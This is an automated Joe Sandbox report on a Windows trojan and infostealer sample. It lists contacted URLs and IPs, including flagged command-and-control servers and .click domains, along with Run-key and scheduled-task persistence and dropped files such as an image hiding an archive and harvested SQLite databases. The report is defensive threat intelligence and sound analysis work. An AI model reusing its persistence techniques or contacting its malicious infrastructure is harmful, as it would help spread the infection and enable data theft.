                                                                                                                                                                                                            https://aka.ms/nativeaot-compatibilityY0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                                                                              https://cdn.cookielaw.org/7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueDJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.netP7620ab885d.exe, 00000009.00000003.2367077966.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2488024648.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://cheapptaxysu.click/)8469cb4d4d.exe, 0000000A.00000003.2190479666.00000000011C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://treehoneyi.click/apiXb285303eae.exe, 0000001B.00000003.2725668549.0000000000D22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://drive-preprod.corp.google.com/68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            185.215.113.43
                                                                                                                                                                                                                            		unknownPortugal
                                                                                                                                                                                                                            		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                            172.217.19.227
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            52.216.112.219
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                            147.45.44.224
                                                                                                                                                                                                                            		unknownRussian Federation
                                                                                                                                                                                                                            		2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                                                                                            172.67.141.124
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            104.21.36.201
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            23.218.208.109
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		6453AS6453USfalse
                                                                                                                                                                                                                            142.250.181.110
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            104.208.16.94
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                            142.250.181.138
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            149.154.167.220
                                                                                                                                                                                                                            		unknownUnited Kingdom
                                                                                                                                                                                                                            		62041TELEGRAMRUfalse
                                                                                                                                                                                                                            34.117.188.166
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                            172.67.209.202
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            35.201.103.21
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            142.250.181.68
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            185.166.143.50
                                                                                                                                                                                                                            		unknownGermany
                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                            34.120.208.123
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            31.41.244.11
                                                                                                                                                                                                                            		unknownRussian Federation
                                                                                                                                                                                                                            		61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                            1.1.1.1
                                                                                                                                                                                                                            		unknownAustralia
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            172.217.19.238
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            172.67.180.113
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            34.117.59.81
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                            34.149.100.209
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                            185.215.113.16
                                                                                                                                                                                                                            		unknownPortugal
                                                                                                                                                                                                                            		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                            172.217.19.174
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            34.107.243.93
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            34.107.221.82
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            35.244.181.201
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            142.250.181.1
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                            		unknownReserved
                                                                                                                                                                                                                            		unknownunknownfalse
                                                                                                                                                                                                                            44.237.186.112
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                            185.215.113.206
                                                                                                                                                                                                                            		unknownPortugal
                                                                                                                                                                                                                            		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                            151.101.193.91
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		54113FASTLYUSfalse
                                                                                                                                                                                                                            35.190.72.216
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            34.160.144.191
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                            173.194.220.84
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            88.221.134.155
                                                                                                                                                                                                                            		unknownEuropean Union
                                                                                                                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                            18.66.161.98
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                            104.21.67.146
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                            Private

                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            127.0.0.1

                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1580355
                                                                                                                                                                                                                            Start date and time:2024-12-24 11:21:16 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 20m 44s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:52
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Sample name:cMTqzvmx9u.exe
                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                            Original Sample Name:0a8673bbea31ae21e9e87be408752436.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@95/117@0/40
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                            • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                            • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                            • VT rate limit hit for: cMTqzvmx9u.exe

                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            05:23:00API Interceptor9405876x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                            05:23:19API Interceptor42x Sleep call for process: 7620ab885d.exe modified
                                                                                                                                                                                                                            05:23:27API Interceptor8x Sleep call for process: 8469cb4d4d.exe modified
                                                                                                                                                                                                                            05:23:38API Interceptor22x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                            05:23:55API Interceptor1x Sleep call for process: 7ddd2a748c.exe modified
                                                                                                                                                                                                                            05:23:59API Interceptor32x Sleep call for process: DJj.exe modified
                                                                                                                                                                                                                            05:24:01API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                            05:24:10API Interceptor8x Sleep call for process: b285303eae.exe modified
                                                                                                                                                                                                                            05:24:23API Interceptor941x Sleep call for process: b9ba85c997.exe modified
                                                                                                                                                                                                                            05:24:47API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                            05:25:05API Interceptor352x Sleep call for process: e6e4c20fad.exe modified
                                                                                                                                                                                                                            05:25:13API Interceptor1x Sleep call for process: firefox.exe modified
                                                                                                                                                                                                                            05:26:18API Interceptor1295x Sleep call for process: graph.exe modified
                                                                                                                                                                                                                            05:26:26API Interceptor7x Sleep call for process: ba944ca4ff.exe modified
                                                                                                                                                                                                                            11:22:23Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            11:23:58Task SchedulerRun new task: MyBootTask path: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            11:24:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                            11:24:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run b9ba85c997.exe C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe
                                                                                                                                                                                                                            11:24:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                            11:24:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run b9ba85c997.exe C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe
                                                                                                                                                                                                                            11:24:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run e6e4c20fad.exe C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            11:25:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fb584dabd7.exe C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe
                                                                                                                                                                                                                            11:25:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 96e283ac77.exe C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe
                                                                                                                                                                                                                            11:25:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run e6e4c20fad.exe C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            11:25:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fb584dabd7.exe C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe
                                                                                                                                                                                                                            11:25:46Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                            11:25:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 96e283ac77.exe C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe
                                                                                                                                                                                                                            11:29:33Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                            11:30:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 93edbb1517.exe C:\Users\user\AppData\Local\Temp\1021723001\93edbb1517.exe
                                                                                                                                                                                                                            11:30:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 7c05a4d3d7.exe C:\Users\user\AppData\Local\Temp\1021724001\7c05a4d3d7.exe
                                                                                                                                                                                                                            11:30:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 7ea6ee2c20.exe C:\Users\user\AppData\Local\Temp\1021725001\7ea6ee2c20.exe
                                                                                                                                                                                                                            11:30:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cfc1c69765.exe C:\Users\user\AppData\Local\Temp\1021726001\cfc1c69765.exe
                                                                                                                                                                                                                            11:30:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 93edbb1517.exe C:\Users\user\AppData\Local\Temp\1021723001\93edbb1517.exe
                                                                                                                                                                                                                            11:30:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 7c05a4d3d7.exe C:\Users\user\AppData\Local\Temp\1021724001\7c05a4d3d7.exe
                                                                                                                                                                                                                            11:31:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 7ea6ee2c20.exe C:\Users\user\AppData\Local\Temp\1021725001\7ea6ee2c20.exe
                                                                                                                                                                                                                            11:31:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cfc1c69765.exe C:\Users\user\AppData\Local\Temp\1021726001\cfc1c69765.exe

                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                            C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):156917
                                                                                                                                                                                                                            Entropy (8bit):7.994509354006501
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                                                                            MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                                                                            SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                                                                            SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                                                                            SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, Author: ditekSHen
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

                                                                                                                                                                                                                            C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):123394
                                                                                                                                                                                                                            Entropy (8bit):7.993523589542907
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:1536:NoxiTioXtBWFfsYExW94I9tiiGCidzWdZNF9p3Ymn9Zqmi943C42nYEmL9yqhTjV:yxFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre
                                                                                                                                                                                                                            MD5:53E54AC43786C11E0DDE9DB8F4EB27AB
                                                                                                                                                                                                                            SHA1:9C5768D5EE037E90DA77F174EF9401970060520E
                                                                                                                                                                                                                            SHA-256:2F606D24809902AF1BB9CB59C16A2C82960D95BFF923EA26F6A42076772F1DB8
                                                                                                                                                                                                                            SHA-512:CD1F6D5F4D8CD19226151B6674124AB1E10950AF5A049E8C082531867D71BFAE9D7BC65641171FD55D203E4FBA9756C80D11906D85A30B35EE4E8991ADB21950
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:PK........DwiY(..wj...........graph.exe..{|...8......f....D]5..HP..d..... Q@b.1.[$.\..&.p.....j.-.V..6...=P!.U@...K...*.>.sf7..b...._/...3....<....oY/..A...................u....].l.(...UyWuv....\x....w.......0|_.].e........*==.m.qq....v....g...~o.........~.V?@.s.......z.......#|.o..........~.].X...%.A......>..xZ.p.0.:.2a.U..PZ...E.^.`>......+d.9..s.x..O.....+............K.2...3...9.M......k3;j.[o.*mg..U.%!...A+.....3O6T{...o....j.:.4.]m...q.{..&...?.A....Q[.|..x.K.X....U.|..V/,......6...|w.s..@0BX...O.I..._..R..@~T.2.t..IK?..M.E.|^............B._C.....-..y;....V.......,|f.wl......:...T./4TbV.\.+..H.....2%.sZ..D.#..}.o..x..w... ..p.!..,..o ...S.]......].}.......c.w..2...<s........!.2'....m.v.><...Ox...O.(C.....@....T.o.Uwm......(ve<...x.f3..\...D..X._.G.7.3.l;..>tQ...5.e..D...lO.i{./..;.JgK........ ...tJ. I.....>..8..Pa...=.Il.S..?.)..@}...:..Cmh.;.v...T.{K..9.)Pqg.%..5.....6..<w..........`-..+h..oA...2.K.......{.."..Wu.;I..w.^o...

                                                                                                                                                                                                                            C:\Program Files\Windows Media Player\graph\graph.exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):251392
                                                                                                                                                                                                                            Entropy (8bit):6.173345887744036
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:TxwndeWCdXSpfDYlUgEP86yZ7JUlfQEc:Tx1dXYYlLEP8l7J8
                                                                                                                                                                                                                            MD5:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                            SHA1:7BD1D979DE4A86CB0D8C2AD9E1945BD351339AD0
                                                                                                                                                                                                                            SHA-256:D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
                                                                                                                                                                                                                            SHA-512:C3164B2F09DC914066201562BE6483F61D3C368675AC5D3466C2D5B754813B8B23FD09AF86B1F15AB8CC91BE8A52B3488323E7A65198E5B104F9C635EC5ED5CC
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.1!am_ram_ram_r*.\sdm_r*.Zs.m_rq.\skm_rq.[sqm_r*.[spm_rq.Zs8m_r*.^shm_ram^r.m_r*.Vs`m_r*.r`m_r*.]s`m_rRicham_r........PE..d...../g.........."....).|...n.................@............................. ............`.....................................................d...............`'...................A..p...........................`@..@...............h............................text....z.......|.................. ..`.rdata..............................@..@.data...$-..........................@....pdata..`'.......(..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\AFIEGIECGCBKFIEBGCAAFIEBFC

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\CBKJJEHCBAKFBFHJKFBK

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\DHJJEGHI

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):106496
